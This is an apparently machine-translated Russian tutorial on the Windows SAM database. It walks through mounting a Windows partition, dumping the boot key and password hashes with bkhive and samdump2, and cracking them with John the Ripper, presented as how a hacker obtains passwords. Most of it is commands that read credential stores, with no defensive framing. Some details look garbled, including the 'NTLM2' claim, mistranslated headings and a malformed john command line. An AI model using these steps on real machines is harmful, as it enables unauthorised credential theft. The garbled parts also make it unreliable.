Что такое хэш паролей и база данных SAM?
SAM предназначен для диспетчера учетных записей безопасности.
База данных SAM является частью Windows.
Операционная система состоит из имени пользователя и пароля в зашифрованном формате, называемом хэшем пароля.
Файл SAM существует в C:/Windows/System32/config в Windows 7/8 / 8.1 / 10.
Если пользователь хочет войти в компьютер, имя пользователя и пароль должны совпадать для аутентификации, введенной пользователем.
Если пользователь набрал неправильное имя пользователя и пароль, аутентификация не удалась.
Алгоритм шифрования при этом NTLM2.
Основная цель SAM – сохранить компьютер и данные перед неавторизованным человеком, например, хакерами.
Но это не полностью работает против профессионального хакера.
Здесь я расскажу вам, как хакер сбрасывает эти хэши паролей из базы данных и узнает пароль, взламывая эти хеши.
Шаг 1. Первый шаг: установите системный раздел Windows
Кликните на Places > Filesystem.
Когда вы щелкнете по файловой системе, раздел windows будет автоматически установлен в каталог /media.
Откройте терминал и введите следующую команду, чтобы достичь местоположении, где была сохранена база данных SAM.
# cd /media/Mounting Point value/Windows/System32/config
В приведенном выше монтировании значение будет изменено в соответствии с системой, вы можете увидеть это значение, выполнив следующую команду:
# ls /media
Шаг 2: Сбросьте загрузочный ключ
# bkhive SYSTEM /root/Desktop/system.txt
System.txt – это файл, в котором хранится ключ загрузки и / root / Desktop – это место для сохранения файла system.txt.
Шаг 3: Дама хэшей паролей
Хэши паролей извлекаются с комбинацией bootkey и базы данных SAM, этот процесс завершается с помощью утилиты samdump2, найденной в kali linux по умолчанию.
Команда дает следующее:
# samdump2 SAM /root/Desktop/system.txt > /root/Desktop/hashes.txt
В реализованной команде база данных SAM и файл system.txt были объединены и создали новый файл hashes.txt
Чтобы увидеть хэши паролей, сдампенные в файл hashes.txt, используйте указанную команду
# cat /root/Desktop/hashes.txt
Измените каталог на /root/Desktop, используя следующую команду:
# cd /root/Desktop
IШаг 4: John the Ripper средство взлома пароля
По достижении каталога для хэшей используйте выполните john с помощью данной команды
# john -format = nt2 -users = vijay hashes.txt